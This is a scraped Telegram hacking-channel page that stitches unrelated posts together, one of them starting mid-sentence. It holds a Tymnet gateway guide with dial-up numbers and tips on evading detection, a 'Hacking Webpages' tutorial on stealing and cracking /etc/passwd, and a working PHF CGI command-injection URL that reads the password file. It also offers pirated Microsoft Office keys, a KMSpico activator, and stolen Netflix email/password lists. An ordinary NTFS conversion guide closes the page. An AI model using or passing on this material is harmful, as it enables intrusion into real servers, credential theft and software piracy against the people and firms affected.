UNDERCODE COMMUNITY
2.69K subscribers
1.23K photos
31 videos
2.65K files
80.8K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
the command in a holding area, a buffer, where it will sit for a few
millionths of a second.The system looks at the command and say's "Does this
person really have authorization to do this, or not?" Then, the command
sits there a few thousandths of a second while the system runs off to
check the user's authorization.When the system comes back to the command,
it will have one of two possible answers: "OK, GO AHEAD," or "SORRY,
GET PERMISSION FIRST."

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ FULL HACKING TECHNIQUES
170 k prem prioxies-email/pass for netflix and more..
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘HACKING TYMNET


TYMNET IS A GATEWAY SYSTEM, LIKE TELENET. AND CAN BE USED TO ACCESS SYSTEMS
THAT MIGHT NOT OTHERWISE HAVE LOCAL NUMBERS. THIS IS JUST A BASIC FILE,
INTENDED FOR SOMEONE WHO HAS NEVER USED TYMNET BEFORE, OR TO HELP SOMEONE WHO
IS LEARNING TO USE TYMNET.


πŸ¦‘ CONNECTING:


1) MOST TYMNET SYSTEMS USE THE FOLLOWING SETTINGS:

--- FULL DUPLEX
--- NO PARITY (OFF OR SPACE PARITY)
--- 1 STOP BIT
--- MOST ARE 300/1200 BAUD

2) ALSO, MOST USE CONTROL-S TO PAUSE LISTING AND CONTROL-Q TO RESUME LISTING.
CONTROL-X STOPS LISTING.
TO ENSURE THAT YOU ARE ALLOWED TO USE CONTROL KEYS, ENTER CONTROL-R BEFORE
TELLING TYMNET WHO YOU WISH TO LOG ONTO.

3) FOR THOSE OF YOU WHOSE TERM ARE CAPABLE OF SENDING AN ESCAPE, AN ESCAPE WILL

4) GET YOU BACK TO THE [...LOG IN] AREA IF YOU EVER FIND YOURSELF STUCK IN A
POSITION WHERE YOU ARE ABOUT TO BE DISCONNECTED.

5) WHEN YOU FIRST CONNECT WITH TYMNET;

[PLEASE TYPE YOUR TERMINAL IDENTIFIER]

WILL PRINT ACROSS YOUR SCREEN. SOMETIMES THIS WILL BE NOTHING BUT A BUNCH OF
GARBAGE, WHICH COULD MEAN THAT YOU CONNECTED AT THE WRONG BAUD, OR THAT YOUR
SYSTEM WILL NEED AN ID LETTER OTHER THAN 'A' OR 'E'. BUT, FOR MOST PURPOSES,
'A' WILL BE THE LETTER THAT YOU WILL ENTER, BUT 'E' IS ALSO A COMMON ID.
HOWEVER, B,C,D,F,G,I,AND P ARE ALSO VALID ID'S.

(COMMIES, APPLES, TI'S & TRS'S USE 'A' OR 'E')

6) THEN A LOCATION NUMBER, WILL BE SHOWN.

[-4004-075-]

AFTER THAT, TYMNET WILL ASK YOU TO;

[PLEASE LOG IN.]

7) YOU WILL ENTER THE SERVICE NAME OR INITIALS AND BE SENT TO THAT SERVICE.

(EXAMPLE:)


[PLEASE TYPE YOUR TERMINAL IDENTIFIER] A
[-4004-075-]

[PLEASE LOG IN.] IBM

------

πŸ¦‘ IN THE EXAMPLE, TYMNET SENT EVERYTHING IN [] BRACKETS, AND YOU ENTERED
EVERYTHING IN LOWER CASE.

FOLLOWING THAT PROCEDURE WOULD SEND YOU TO IBM.


πŸ¦‘ SYSTEMS ON TYMNET:

TRY USING NAMES, OR SIMPLE 3-5 CHARACTER CODES. REMEMBER, NEW USERS ARE
SUPPOSED TO BE ABLE TO USE TYMNET SECONDS AFTER UNPACKING THEIR COMPUTERS,
SO THINK SIMPLE.

ALSO, TRY GETTING A BUNCH OF SYSTEM NAMES THAT WORK ON TELENET, UNINET,
OR DATAPAC AND TRY THEM ON TYMNET. TRY ENTERING THE NAME, INITIALS OR
INITIALS & NUMBERS.

--- EXAMPLES:

DOW1;; & DOW2;; = DOW JONES, WHEN TYMNET ASKS FOR SERVICE, ENTER 'DJNS'.
STANDARD
10 CHARACTER PASSWORD.

CIS01 & CIS02 & CPS = COMPUSERVE, STANDARD FORMAT.

LEXIS & NEXIS = LEXIS & NEXIS, WHEN IT ASKS FOR TERMINAL ID, ENTER '.LEXIS' OR
'.TELV950'

NEWS1 = NEWSNET

ONTYME = ONTYME (MCDONALD DOUGLAS INTERNATIONAL DATA LIBRARY)

IBM = (WHAT ELSE?) I.B.M

ART = HONEYWELL'S 'SYSTEM M'.

DIR. = DIRECTORYNET.

TEL = ??? (CONTACT ME IF YOU FIND OUT)

INDEX = MTECH/COMMERCIAL SERVICES DIVISION.

VAX1 = UCC UCEL ON-LINE

OPER = NET940/111

PLINK = PEOPLE/LINK 6 CHAR ID. 9 CHAR PASSWORD.

-----


TYMNET GATEWAY NUMBERS:
-------------------------


WASHINGTON (206): 825-7720, 754-3900, 375-3367, 285-0109, 747-4105, 272-1503
693-0371, 453-1591, 825-7781

ALABAMA (205) : 236-2655, 942-4141, 882-3003, 343-8414, 265-4570, 345-1420

ALASKA HAS 'ALASKANET' A SIMILAR SYSTEM.
ARIZONA (602) : 254-5811, 790-0764

CALIFORNIA (818): 308-1800, 789-9002, 841-7890
(714): 371-2291, 594-4567, 966-0313, 370-1200, 498-9504,
(415): 778-3420, 952-4757, 682-3851, 490-7366, 430-2900, 836-8700

COLORADO (303) : 590-1003, 830-9210, 356-0425, 543-3313

CONNETICUT (203): 242-7140, 773-0082, 226-5250

FLORIDA (305) : 395-7330, 463-0887, 466-0661

GEORGIA (404) : 546-0167, 446-0270, 722-7967, 327-0369, 424-0025, 291-1000

HAWAII (808) : 528-4450

IDAHO (208) : 343-0404, 523-2964, 233-2501

KENTUCKY (502) : 782-0436, 499-7110

LOUISIANA (318) : 443-9544, 237-9500, 436-1633, 322-4109, 688-5840

MICHIGAN (313) : 662-8282, 963-3388, 963-8880, 963-2353, 732-7303, 459-8900
985-6005, 569-8350
(517) : 787-9461, 484-6602, 631-4721

MONTANA (406) : 252-4880, 586-7638, 494-6615, 727-0100, 728-2415

NEBRASKA (402) : 475-8659, 397-0414
NEVADA (702) : 293-0300, 885-8411

OKLAHOMA (405) : 223-1552, 233-7903, 355-0745, 947-6387, 582-4433

OREGON (503) : 485-0027, 773-1257, 226-0627, 399-1453

TEXAS (713) : 427-5856, 556-6700

VERMONT (802) : 658-2123, 223-3519


THOSE AREN'T ALL THE TYMNET NUMBERS, BUT YOU SHOULD BE ABLE TO FIND ONE
TO CALL.


CAUTION:
----------


TYMNET SEEMS TO BE BECOMING AWARE OF HACKERS, AND CALLING THE SAME PLACE TOO
MANY TIMES IN A ROW COULD HAVE COMPLICATED RESULTS. ESPECIALLY IF YOU ONLY
GO TO 1 OR 2 DIFFERENT SYSTEMS.
TRY ALL THE ID'S UNTILL YOU FIND SEVERAL THAT WORK WITH YOUR SYSTEM, THEN
NOT ONLY CAN YOU GO TO SEVERAL DIFFERENT PLACES SO AS NOT TO ATTRACT ATTENTION
TO YOURSELF, BUT YOU CAN ENTER A DIFFERENT ID LETTER ALSO.


IF YOU HAVE ANY QUESTIONS, ADDITIONS OR COMPLAINTS, CONTACT ME ON:
THE CARTEL BBS 'SEMI-NETWORK' Main Board - 206-825-6236.

---
πŸ¦‘SILICON RAT
=+=

==============================================================================


X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
Another file downloaded from: The NIRVANAnet(tm) Seven

& the Temple of the Screaming Electron Taipan Enigma 510/935-5845
Burn This Flag Zardoz 408/363-9766
realitycheck Poindexter Fortran 510/527-1662
Lies Unlimited Mick Freen 801/278-2699
The New Dork Sublime Biffnix 415/864-DORK
The Shrine Rif Raf 206/794-6674
Planet Mirth Simon Jester 510/786-6560


@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘HACKING TYMNET full
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘a good tool for termux :


1) git clone https://github.com/joker25000/Devploit.git

2) cd Devploit

3) chmod +x install

4) ./install

5) Run in Terminal

Devploit

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Hacking Webpages

1) Getting the Password File Through FTP

Ok well one of the easiest ways of getting superuser access is through
anonymous ftp access into a webpage. First you need learn a little about
the password file...

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

2) This is an example of a regular encrypted password file. The Superuser is
the part that gives you root. That's the main part of the file.

root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp

3) This is another example of a password file, only this one has one little
difference, it's shadowed. Shadowed password files don't let you view or
copy the actual encrypted password. This causes problems for the password
cracker and dictionary maker(both explained later in the text). Below is
another example of a shadowed password file:

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

5) Shadowed password files have an "x" in the place of a password or sometimes
they are disguised as an * as well.

Now that you know a little more about what the actual password file looks
like you should be able to identify a normal encrypted pw from a shadowed
pw file. We can now go on to talk about how to crack it.

6) Cracking a password file isn't as complicated as it would seem, although the
files vary from system to system. 1.The first step that you would take is
to download or copy the file. 2. The second step is to find a password
cracker and a dictionary maker..
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Web hacking :
The PHF Technique

1) The phf technique is by far the easiest way of getting a password file
(although it doesn't work 95% of the time). But to do the phf all you do
is open a browser and type in the following link:

http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

2) You replace the webpage_goes_here with the domain. So if you were trying to
get the pw file for www.webpage.com you would type:

http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

and that's it! You just sit back and copy the file(if it works).

3) The best way to get root is with an exploit...


▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ Hacking Webpages
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Product Key For Microsoft Office 2019> lastest Version :

7B8HU-YGTFV-54WA4-ESXD5-FR6TF
AE4SX-5CR6T-FV7BG-8YHUN-KY7GT
6F5RD-E4S4A-ZWSXE-D5CRT-KFVGY

πŸ¦‘MS Office 2019 Key
6TFV7-BGY8H-UN9IJ-98NHU-BGKY7
ZAQ3W-SE4XT-FV6BY-8HUNI-J9DSM
8NHUB-GTFV6-DE4SW-4SEX5-DG1CR

πŸ¦‘MS Office 2019 Serial Number
7Y8UH-Y6T5S-W3E4X-DCR6T-KFV7B
Y8NHU-9HY7G-T6FD5-RS4WS-GJZE4
XDCRT-FV7BG-8YHUN-YTFVD-BVCSA
kmspico.zip
3 MB
Password 12345 lastest version
activate office and windows
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Converting to NTFSwhy recommended ?

Your hard drive must be formatted with a file system such as FAT, FAT32 or NTFS so that Windows can be installed on to it. This system determines how files are named, organised and stored on the drive. If you’re not using it already, NTFS (New Technology File System) is recommended for Windows XP because of the additional functionality it offers. If your PC came with Windows XP pre-installed then there’s a chance that you’re already using NTFS. If you’ve upgraded from Windows 98 or Windows Me you may still be using FAT or FAT 32. The option to change over to NTFS would have been available during the upgrade process. Don’t worry if you skipped this as it’s possible to convert at any time from within Windows XP without losing any data.

πŸ¦‘The recommended option
There are a number of features in Windows that will only work if the NTFS file system is present, which is why it’s suggested you make use of it. File and folder permissions, encryption and privacy options are just some of those you’ll be able to access. In particular, those of you who have set up user accounts will find NTFS invaluable. For instance, if you continue to use FAT or FAT32 anyone with physical access to the drive will be able to access the files and folders that are stored there. However, with NTFS you’ll be able to use a level of encryption (Professional Edition only) that will enable you to protect your data.

πŸ¦‘You’ll also find NTFS more reliable in that it’s more able to recover from disk errors than its FAT or FAT32 counterparts. A log of all disk activity is kept so should a crash occur, Windows XP can use this information to repair the file system when your PC boots up again. To find out what file system you’re using, open My Computer, right-click your main hard drive and choose Properties. Take a look at the General tab to see confirmation of the file system that’s in use.

πŸ¦‘Convert now
You can use the convert tool in Windows XP to change the file system on your hard disk from FAT or FAT32 to NTFS. The whole process is safe and your existing data won’t be destroyed. To begin, click Start -> Run, type cmd and press [Return]. At the command prompt type convert c: /fs:ntfs and press [Return] (where β€˜c’ is the letter of the drive you’re converting). When you try and run the convert utility, it’s likely that Windows XP will be using your paging file so the process won’t be completed immediately. Therefore, you’ll see a brief message on screen informing you that the conversion will take place instead the next time Windows starts up. Having restarted, the Check Disk utility will run, the conversion will be performed automatically and you may find that your PC will reboot twice more.

πŸ¦‘The benefits
With your drive now running NTFS, it’s time to take advantage of the new options that are available. Having created a number of different user accounts you can now control the level of access that’s granted to individual users. For example, there are going to be certain files and folders that you’ll want some users to be able to access but not others. If you have Windows XP Professional Edition you can do this immediately.

>Right-click any file or folder, choose Properties and select the Security tab. A dialog will be displayed showing the names of all your users. Alongside will be two columns which enable you to select levels of access for each of them, the permissions include Full Control, Modify, Read and Write. You can then check the appropriate box to determine whether or not to Allow or Deny a particular permission. For Windows XP Home Edition users, the Security tab won’t be immediately available. To access this option you’ll need to restart your PC, pressing [F8] until a menu appears. Next select Safe Mode and wait for Windows XP to start up. You can then set your options in the same way.
πŸ¦‘Another feature is NTFS compression. It’s quick and seamless as your file or folder is decompressed automatically when you access it. (Don’t confuse this with a Zip compression utility where the files need to be extracted before they can be accessed.) Although you may have used NTFS compression on a file or folder, there’s no way of telling just by looking at it. To remedy this, open My Computer, click Tools -> Folder Options and select the View tab. Under Advanced settings, scroll down and check the option β€˜Show encrypted or compressed NTFS files in color’, then click Apply and OK. Take a look at your compressed items in My Computer and you’ll see the text label has changed from black to blue. Something else that’s exclusive to Professional Edition users is the Encrypting File System (EFS). You can use this to protect your important data so that no one else can read it. Your encrypted files and folders will only be accessible when you have logged into your user account successfully.

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
THEIR IS 100 reason why NTFS RECOMMENDED TO FORMAT YOUR WINDOWS